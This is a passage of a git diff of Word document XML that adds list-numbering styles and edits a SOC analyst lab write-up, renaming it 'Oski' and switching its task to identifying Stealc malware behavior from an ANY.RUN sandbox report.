+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41E94ADF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4508BCD4"/>
@@ -526,11 +5493,504 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="43141559"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3A566774"/>
+    <w:lvl w:ilvl="0" w:tplc="E9BEC1DA">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5085425E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BB0C414C"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6A11669D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C37C1738"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="723F297F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2D64C926"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="791F6A5F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F8F209E0"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1684555836">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="215703269">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1038580874">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="79446798">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1566376629">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1693651851">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="368729510">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="995913821">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1939436818">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="596404818">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/SOC analyst lv 1/TEMP.docx
+++ b/SOC analyst lv 1/TEMP.docx
@@ -32,22 +32,14 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Crime</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Oski</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -273,15 +265,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Access, </w:t>
+        <w:t xml:space="preserve"> Access, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -332,68 +316,32 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ALEAPP, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">DB </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Browser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>SQLite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ANY.RUN</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -468,25 +416,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Utilize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ALEAPP to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>analyze</w:t>
+        <w:t>Analyze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>sandbox</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -504,7 +452,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Android</w:t>
+        <w:t>report</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -522,7 +470,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>device</w:t>
+        <w:t>using</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -540,7 +488,79 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>artifacts</w:t>
+        <w:t>Any.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Stealc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>behavior</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -558,25 +578,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>reconstructing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim's</w:t>
+        <w:t>extract</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
